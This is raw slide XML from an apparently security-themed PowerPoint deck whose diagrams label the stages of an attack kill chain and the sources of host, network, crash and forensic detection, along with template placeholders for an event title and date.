      <dgm:prSet presAssocID="{AB3196C8-4853-4720-B740-76F5597A7A01}" presName="parTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1CC8A5B-FF23-443B-9C9C-4A6ECB3FFB7B}" type="pres">
      <dgm:prSet presAssocID="{AB3196C8-4853-4720-B740-76F5597A7A01}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78792E09-9553-4B22-920C-C606C7CE290E}" type="pres">
      <dgm:prSet presAssocID="{89CB1844-AB0E-4731-B39A-B08F7A7BD86F}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C4E52DE3-00B9-44B0-9829-400CC0156681}" type="presOf" srcId="{539F5590-57E8-4B18-B771-0357E8076C22}" destId="{930BE532-D82A-423C-85D1-F308C367B3A4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{F76196A9-D637-45CD-9E53-6486E2D0AA98}" type="presOf" srcId="{6A06119E-26A2-482A-8C7F-6996594F85DE}" destId="{94646236-8DBB-47F2-9815-7715198FC7E8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{33D1E2C8-B913-481E-9BD7-731BB17BE97C}" type="presOf" srcId="{17157F98-F25A-4E15-B047-0E66D631D9E7}" destId="{DB06E63D-2704-4A93-9317-C0839AAEE4FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{EAF392A4-AB36-4855-8B17-456B7961F603}" srcId="{81FCF048-0F9B-49D9-B659-F9172DA4BF36}" destId="{A5C49694-4EBD-4654-A6FC-14C5E1A6C7CC}" srcOrd="2" destOrd="0" parTransId="{17157F98-F25A-4E15-B047-0E66D631D9E7}" sibTransId="{B701EFB1-83CA-4D44-B701-D2AFE0213FF5}"/>
    <dgm:cxn modelId="{8E5AD4D9-E54E-41A9-8D32-1840C8C17DB7}" srcId="{74D1D572-9F76-4525-B693-38A4923999AC}" destId="{81FCF048-0F9B-49D9-B659-F9172DA4BF36}" srcOrd="0" destOrd="0" parTransId="{1A09333E-8633-4B68-AE56-55C55C684DA1}" sibTransId="{1F105BC0-A793-4F9F-AAA9-DD9AE3F8BBDA}"/>
    <dgm:cxn modelId="{B60168D0-0AE0-4B9B-9BB7-8A90A57EA877}" type="presOf" srcId="{AB3196C8-4853-4720-B740-76F5597A7A01}" destId="{A1CC8A5B-FF23-443B-9C9C-4A6ECB3FFB7B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{4EF0FE35-2EDC-4029-ABB4-BA469242273C}" srcId="{81FCF048-0F9B-49D9-B659-F9172DA4BF36}" destId="{111BEDBA-40AC-46FB-808B-9D918A10E313}" srcOrd="0" destOrd="0" parTransId="{C3D22295-625D-4CF8-9E60-BBF96BB07E6D}" sibTransId="{8C7FCA23-46DD-4D5B-82A2-50485AD4FA9C}"/>
    <dgm:cxn modelId="{A50AAFB6-DE17-41EC-83C1-8DE29915FB7C}" type="presOf" srcId="{111BEDBA-40AC-46FB-808B-9D918A10E313}" destId="{2A6B2FF6-8E0D-4631-85E6-BFCDE0580A9B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{C539C0C7-3695-41EA-9AB0-43681AE6289F}" type="presOf" srcId="{74D1D572-9F76-4525-B693-38A4923999AC}" destId="{EE506720-BF1B-41DF-97A7-332D26E50661}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{8B2DF6EC-8D44-4172-8B23-37B1AF5BCF8E}" type="presOf" srcId="{539F5590-57E8-4B18-B771-0357E8076C22}" destId="{E1FBD15E-8FE9-4D84-B632-C996B610F2ED}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{D8D8BB38-1CA7-44AE-9B53-DE3994146CEF}" type="presOf" srcId="{C3D22295-625D-4CF8-9E60-BBF96BB07E6D}" destId="{BC10E8FF-321B-463A-9CB2-70C66FA5C07E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{6E32E328-D41B-4669-A6DE-B46CBA7321B1}" type="presOf" srcId="{17157F98-F25A-4E15-B047-0E66D631D9E7}" destId="{C894399B-28B0-42AC-BB26-49BC912E734E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{7A9BCEEC-E1B3-40F1-AA57-7B30F36EA2AF}" type="presOf" srcId="{C3D22295-625D-4CF8-9E60-BBF96BB07E6D}" destId="{400D6494-5FCC-4CBC-B7A1-0EB9EB83F3F5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{827452D4-E81C-4738-AC7B-0121B34C47AA}" srcId="{81FCF048-0F9B-49D9-B659-F9172DA4BF36}" destId="{6A06119E-26A2-482A-8C7F-6996594F85DE}" srcOrd="1" destOrd="0" parTransId="{539F5590-57E8-4B18-B771-0357E8076C22}" sibTransId="{849B1357-0297-4DDB-B044-99D790E9B026}"/>
    <dgm:cxn modelId="{9E4C09C1-9770-4604-87A2-1EEF44AD7FCA}" srcId="{81FCF048-0F9B-49D9-B659-F9172DA4BF36}" destId="{89CB1844-AB0E-4731-B39A-B08F7A7BD86F}" srcOrd="3" destOrd="0" parTransId="{AB3196C8-4853-4720-B740-76F5597A7A01}" sibTransId="{6C965B05-A7CB-4A6B-AE01-B2F12EDFEA70}"/>
    <dgm:cxn modelId="{5AD6BA63-A5A6-4597-ADC0-0E708CFBFF8D}" type="presOf" srcId="{89CB1844-AB0E-4731-B39A-B08F7A7BD86F}" destId="{78792E09-9553-4B22-920C-C606C7CE290E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{A285E387-848A-4F0F-8515-AA7A28646A23}" type="presOf" srcId="{AB3196C8-4853-4720-B740-76F5597A7A01}" destId="{E4DD00FF-EC35-45B3-8204-392771E5CDCC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{17C04391-6581-4E82-9E4B-79BBCFB1FDBA}" type="presOf" srcId="{A5C49694-4EBD-4654-A6FC-14C5E1A6C7CC}" destId="{A94E3F30-E231-45C5-A30F-915289D7FF03}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{C3043A98-4181-47B3-AA56-7C9353AEE4FD}" type="presOf" srcId="{81FCF048-0F9B-49D9-B659-F9172DA4BF36}" destId="{E70D8E72-9690-46BF-B680-66EAED33EA0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{1139E1E1-ECEC-4302-8397-7A48CF1E1BD8}" type="presParOf" srcId="{EE506720-BF1B-41DF-97A7-332D26E50661}" destId="{E70D8E72-9690-46BF-B680-66EAED33EA0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{303E95F6-45DD-45BC-838C-B86F0AE65EE7}" type="presParOf" srcId="{EE506720-BF1B-41DF-97A7-332D26E50661}" destId="{BC10E8FF-321B-463A-9CB2-70C66FA5C07E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{A1383011-CC8D-404C-9A89-BDFFEA78581C}" type="presParOf" srcId="{BC10E8FF-321B-463A-9CB2-70C66FA5C07E}" destId="{400D6494-5FCC-4CBC-B7A1-0EB9EB83F3F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{BFC5C932-E42F-4DDB-BFC2-3473809A44C7}" type="presParOf" srcId="{EE506720-BF1B-41DF-97A7-332D26E50661}" destId="{2A6B2FF6-8E0D-4631-85E6-BFCDE0580A9B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{967BA99E-D293-42CE-98E2-0685F72B020F}" type="presParOf" srcId="{EE506720-BF1B-41DF-97A7-332D26E50661}" destId="{930BE532-D82A-423C-85D1-F308C367B3A4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{FD5F42F3-E572-4E87-984E-26C441B12344}" type="presParOf" srcId="{930BE532-D82A-423C-85D1-F308C367B3A4}" destId="{E1FBD15E-8FE9-4D84-B632-C996B610F2ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{A0CCB17A-5F4A-4FA3-9E89-995BB309F9B6}" type="presParOf" srcId="{EE506720-BF1B-41DF-97A7-332D26E50661}" destId="{94646236-8DBB-47F2-9815-7715198FC7E8}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{D5889EB2-9202-440B-9F02-D653E9599C00}" type="presParOf" srcId="{EE506720-BF1B-41DF-97A7-332D26E50661}" destId="{DB06E63D-2704-4A93-9317-C0839AAEE4FB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{57BF4EFE-8032-4C00-9C73-667B8B44EF39}" type="presParOf" srcId="{DB06E63D-2704-4A93-9317-C0839AAEE4FB}" destId="{C894399B-28B0-42AC-BB26-49BC912E734E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{BB932F62-086D-4138-9CF1-3E1B9B3B9B3D}" type="presParOf" srcId="{EE506720-BF1B-41DF-97A7-332D26E50661}" destId="{A94E3F30-E231-45C5-A30F-915289D7FF03}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{7B6AEFF5-6BDF-4F5A-B0A5-D39AFF299D15}" type="presParOf" srcId="{EE506720-BF1B-41DF-97A7-332D26E50661}" destId="{E4DD00FF-EC35-45B3-8204-392771E5CDCC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{D2F218C2-52A3-4948-9D2D-4D0C2F8D27D9}" type="presParOf" srcId="{E4DD00FF-EC35-45B3-8204-392771E5CDCC}" destId="{A1CC8A5B-FF23-443B-9C9C-4A6ECB3FFB7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial5"/>
    <dgm:cxn modelId="{D02666A1-3980-4E7C-B6BC-775C38BFF808}" type="presParOf" srcId="{EE506720-BF1B-41DF-97A7-332D26E50661}" destId="{78792E09-9553-4B22-920C-C606C7CE290E}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial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C459B-8B96-499D-9275-7BAB340E5118}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgb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Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Reconnaissance</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="322174" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{414FA506-5C56-444D-B0A9-1B8F7989D9D0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1449783" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgb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Weaponization</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1771957" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C1FC703B-9AA1-4234-8EE4-8C7EAEBA9873}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2899566" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgb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Delivery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3221740" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B4776655-5682-4618-995A-AE28AE427452}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4349349" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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Exploitation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4671523" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{25EDC683-A133-4396-BE21-B5595EBF9F7B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5799132" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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Installation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6121306" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{11B4B22A-DE7B-47AC-8873-62E8BC82FD14}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7248915" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="68217A"/>
        </a:solidFill>
        <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="95000"/>
              <a:alpha val="50000"/>
              <a:satMod val="150000"/>
            </a:srgb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C2</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7571089" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C3A69038-0147-4BAF-BB50-8D7B8431FC72}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8698698" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="68217A"/>
        </a:solidFill>
        <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="95000"/>
              <a:alpha val="50000"/>
              <a:satMod val="150000"/>
            </a:srgb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latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Actions on Intent</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9020872" y="196628"/>
        <a:ext cx="966522" cy="644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D8E72-9690-46BF-B680-66EAED33EA0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2359917" y="1285512"/>
          <a:ext cx="916446" cy="91644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Analyst Investigation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2494127" y="1419722"/>
        <a:ext cx="648026" cy="648026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BC10E8FF-321B-463A-9CB2-70C66FA5C07E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="2720759" y="951490"/>
          <a:ext cx="194762" cy="311591"/>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highlight>
              <a:srgbClr val="0072C6"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2749974" y="1043023"/>
        <a:ext cx="136333" cy="186955"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2A6B2FF6-8E0D-4631-85E6-BFCDE0580A9B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2359917" y="1589"/>
          <a:ext cx="916446" cy="91644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Host detection</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2494127" y="135799"/>
        <a:ext cx="648026" cy="648026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{930BE532-D82A-423C-85D1-F308C367B3A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3357209" y="1587940"/>
          <a:ext cx="194762" cy="311591"/>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highlight>
              <a:srgbClr val="0072C6"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3357209" y="1650258"/>
        <a:ext cx="136333" cy="186955"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{94646236-8DBB-47F2-9815-7715198FC7E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3643841" y="1285512"/>
          <a:ext cx="916446" cy="91644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Network Detection</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3778051" y="1419722"/>
        <a:ext cx="648026" cy="648026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB06E63D-2704-4A93-9317-C0839AAEE4FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2720759" y="2224389"/>
          <a:ext cx="194762" cy="311591"/>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highlight>
              <a:srgbClr val="0072C6"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2749974" y="2257493"/>
        <a:ext cx="136333" cy="186955"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A94E3F30-E231-45C5-A30F-915289D7FF03}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2359917" y="2569436"/>
          <a:ext cx="916446" cy="91644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Crash Detection</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2494127" y="2703646"/>
        <a:ext cx="648026" cy="648026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E4DD00FF-EC35-45B3-8204-392771E5CDCC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="2084309" y="1587940"/>
          <a:ext cx="194762" cy="311591"/>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highlight>
              <a:srgbClr val="0072C6"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="2142738" y="1650258"/>
        <a:ext cx="136333" cy="186955"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{78792E09-9553-4B22-920C-C606C7CE290E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1075994" y="1285512"/>
          <a:ext cx="916446" cy="91644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Forensics Detection</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1210204" y="1419722"/>
        <a:ext cx="648026" cy="6480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2/8/2017 10:33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2/8/2017 10:33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13AC5-A22B-4DED-94D7-FEF4AAF386A0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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00722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13AC5-A22B-4DED-94D7-FEF4AAF386A0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/8/2017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6444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3D29CA-888C-4D24-A793-E6A66665E7E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653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2/8/2017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062241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317" y="1206"/>
            <a:ext cx="12435840" cy="699211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480117"/>
            <a:ext cx="1449939" cy="309512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="274638" y="2146651"/>
            <a:ext cx="7315200" cy="2702363"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="146304" tIns="91440" rIns="146304" bIns="91440" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400" spc="-100" baseline="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="25664">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="41000">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event name here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="274638" y="4868864"/>
            <a:ext cx="7315200" cy="894549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="109728" bIns="109728">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2400" baseline="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="25664">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="41000">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>City | Date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5742370"/>
            <a:ext cx="1810513" cy="772730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29069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15929">
                      <a:srgbClr val="1E1E1E"/>
                    </a:gs>
                    <a:gs pos="43000">
                      <a:srgbClr val="1E1E1E"/>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3565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72677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991">
                      <a:srgbClr val="1E1E1E"/>
                    </a:gs>
                    <a:gs pos="38000">
                      <a:srgbClr val="1E1E1E"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925172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4458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317" y="1206"/>
            <a:ext cx="12435840" cy="6992111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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480117"/>
            <a:ext cx="1449939" cy="309512"/>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5742370"/>
            <a:ext cx="1810513" cy="772730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141417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116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1575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1" y="480117"/>
            <a:ext cx="1449936" cy="309512"/>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00193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832" y="1495"/>
            <a:ext cx="12435838" cy="6992111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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1" r:id="rId18"/>
    <p:sldLayoutId id="2147484322" r:id="rId19"/>
    <p:sldLayoutId id="2147484323" r:id="rId20"/>
    <p:sldLayoutId id="2147484324" r:id="rId21"/>
    <p:sldLayoutId id="2147484325" r:id="rId22"/>
    <p:sldLayoutId id="2147484326" r:id="rId23"/>
    <p:sldLayoutId id="214748432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0.jpeg"/><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52.wmf"/><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g"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.jpg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" 